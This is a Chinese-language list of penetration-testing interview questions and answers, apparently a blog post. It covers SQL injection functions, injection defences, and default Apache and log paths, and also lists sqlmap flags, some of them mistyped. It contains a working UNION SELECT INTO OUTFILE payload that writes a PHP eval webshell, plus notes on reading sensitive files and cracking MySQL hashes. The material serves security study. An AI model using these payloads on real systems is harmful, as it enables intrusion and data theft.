-
网络安全面试题
-
报错注入有哪些函数
-
updatexml注入
-
载荷注入
-
insert注入
-
updata注入
-
delete注入
-
-
extractvalue()注入
-
-
注入防御方法
-
涵数过滤
-
直接下载相关防范注入文件,通过incloud包含放在网站配置文件里面
-
PDO预处理,从PHP 5.1开始,php可以通过PDO的prepare预处理函数执行sql语句
-
-
mysql写webshell注入点需要哪些条件
-
需要知道远程web目录
-
需要知道MySQL root权限
-
需要知道远程目录有写入权限
-
需要数据库开启secure_file_priv 相当于secure_file_priv的值为空,不为空不充许写入webshell (默认不开启,需要修改mysql.ini配置文件)
-
-
数据库注入常见的函数
-
database()、user()、version()、system()、concat()
-
database这个函数返回当前正在连接的数据库名
-
提供当前数据库会话的用户名
-
返回数据库服务器的版本信息
-
可以用来执行操作系统级别的命令
-
concat这个函数用于连接多个字符串或表达式
-
-
-
mysql数据库的账号密码保存在哪里
-
数据库最高权限是root 密码保存在数据库user表中;密码条用musql 5特有的加密,cmd5解密
-
-
apache的默认路径
-
/etc/apache2/httpd.conf 或
-
/etc/httpd/conf/httpd.conf
-
-
apache的日志文件路径
-
Linux
-
错误日志:/var/log/apache2/error.log
-
访问日志:/var/log/apache2/access.log
-
-
Windows(假设Apache安装在默认的C:\Apache24目录下)
-
错误日志:C:\Apache24\logs\error.log
-
访问日志:C:\Apache24\logs\access.log
-
-
-
mysql4与5的注入区别
-
MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。 首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。
-
MySQL 5版本由于information_schema库的存在,注入攻击相对来说方便了许多 通过load_file()函数来读取脚本代码或系统敏感文件内容,进行漏洞分析或直接获取数据库连接账号、密码。 通过dumpfile/outfile函数导出获取WebShell。
-
-
mysql写webshell的语句如何写
-
union select "<?php @eval($_POST['123']);?>",2 into outfile "C:\\phpStudy\\WWW\\123.php"+--+&Submit=Submit
-
-
sqlmap的post注入用什么参数
-
-r
-
-
sqlmap的cookie注入加什么参数
-
--level ≥2
-
执行测试的等级(1-5,默认为1)
-
-
-
sqlmap检查user-agent和refere头用什么参数
-
--level ≥3
-
-
sqlmap获取表名
-
--tables -D 数据库名
-
-
sqlmap的get注入用什么参数
-
-u
-
-
sqlmap注入显示paybad
-
-v 3
-
-
sqlmap获取当前数据库表名
-
--current -db
-
-
sqlmap当前所有数据库名
-
--dbs
-
-
sqlmap获取字段名
-
--columns -T user(表) -D abc(库)
-
-
sqlmap指定参数注入
-
-p
-
-
sqlmap获取当前用户
-
--current-user
-
-
sqlmap列出数据库所有用户
-
--users
-
-
网络安全相关面试题(hw)
最新推荐文章于 2025-03-24 09:17:37 发布